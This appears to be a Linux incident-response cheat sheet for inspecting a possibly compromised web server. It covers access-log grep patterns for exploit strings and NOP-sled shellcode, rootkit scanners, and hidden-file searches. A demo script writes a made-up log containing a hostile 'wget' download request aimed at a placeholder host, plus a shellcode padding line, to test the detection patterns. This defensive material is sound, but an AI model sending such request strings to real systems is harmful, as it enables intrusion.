What version of Linux is running
root:~#cat /etc/redhat-release
or, for non-Red Hat Linux:
root:~#cat /etc/issue
Compare this to the kernel:
root:~#uname -a
and
root:~#cat /proc/version
Who is the author of the file:
root:~#ls -la --author
When was the last time the file was accessed, and by whom:
root:~#ls -l --time=access
Before you run off and use the cat command it is good to first check the file type with the file command. Many a time I myself have been fooled seeing a file marked as something.html and finding it was really a binary file.
What kind of file is it:
root:~#file filename
or
root:~#file /path/to/directory/*
Real Time Network Activity Examples:
root:~#watch -d "netstat -nalp |grep -v DGRAM |grep -v STREAM |grep -v LISTEN"
root:~#watch 'netstat -nalp | grep ":TCP PORT Number"'
root:~#watch 'netstat -nalp | grep ":22"'
Update the Locate Database:
root:~#updatedb &
Search for Apache Exploit
for i in $(locate access_log); do echo "$i"; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' "$i"; done
or
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
cPanel
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
Plesk
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*
Of course, not everything this locates is an exploit; it takes some interpreting. You are looking for obvious things such as a call to wget to download a file, or a call to perl that looks strangely out of place. However, one thing this search does not cover is shellcode. Once you have located the access logs, run a second search for long strings containing \x90 (the NOP byte used to pad shellcode). I have yet to find a good interpreter of what these shellcodes do, but again google.com is your friend. Most often you can search for the code itself and come up with a technical explanation of what it does.
Search for Shell Code:
grep -F '\x90' /path/to/access/logs/*
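The exploit-string search above and the shellcode search, run together over a small constructed access log so you can see which lines the patterns catch and which benign lines they skip (added example, not from the original post; the log lines and hostnames are made up):

```shell
#!/bin/sh
# Added example: apply the page's two access-log checks to a constructed log.

# Write a small constructed access_log (not real traffic) to the given path.
make_sample_log() {
  cat > "$1" <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/test.cgi?cmd=wget%20http://example.invalid/x HTTP/1.1" 200 12
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=chr(112) HTTP/1.1" 200 88
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /download/perl-manual.pdf HTTP/1.1" 200 4096
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /\x90\x90\x90\x90\x90\x90 HTTP/1.1" 400 0
EOF
}

# The page's egrep pattern: an inline chr( or system( call, or a shell tool
# name followed by an encoded space (%20). Note "perl-manual.pdf" does not
# match because "perl" is not followed by %20; the pattern wants a command
# with arguments, not the word on its own.
scan_for_exploit_strings() {
  grep -E -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' "$1"
}

# NOP-sled check: a run of literal "\x90" text. -F makes the backslash
# literal, so the pattern is the four characters \ x 9 0, not a byte escape.
scan_for_nop_sled() {
  grep -F '\x90\x90\x90' "$1"
}

# Line counts of each check, so the results can be asserted on.
count_exploit_hits() { scan_for_exploit_strings "$1" | wc -l | tr -d ' '; }
count_nop_hits()     { scan_for_nop_sled "$1" | wc -l | tr -d ' '; }

# Stand-alone run: print the hits for the constructed log.
if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp)
  make_sample_log "$tmp"
  echo "exploit-string hits:"; scan_for_exploit_strings "$tmp"
  echo "NOP-sled hits:";       scan_for_nop_sled "$tmp"
  rm -f "$tmp"
fi
```

Run with `--demo` to see the two matching request lines and the one NOP-sled line; on a real host point the functions at the log paths listed above.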
Finally, now you can run your favorite virus scanner and rootkit hunter. Some favorites include rkhunter and chkrootkit.
ChkRootkit
http://www.chkrootkit.org
RKHunter
http://www.rootkit.nl
Hopefully by now the updatedb has finished; you can check its status using the jobs command. Look for things that are out of place and don't belong: are there .bash_history or access_log files that seem to be in the wrong area? This is where you try to think like a hacker and find the strange things that just don't seem right.
Think Like a Hacker in Your Search
root:~#locate .bash_history
root:~#locate access_log
root:~#locate "..."
root:~#locate ".. "
root:~#locate " .."
root:~#locate ". "
root:~#locate " ."
Who Owns the IP Address
root:~#whois 12.34.56.78
Gather all Data About the IP Address
root:~#for i in $(find /var/log -type f); do echo "$i"; grep -F "12.34.56.78" "$i"; done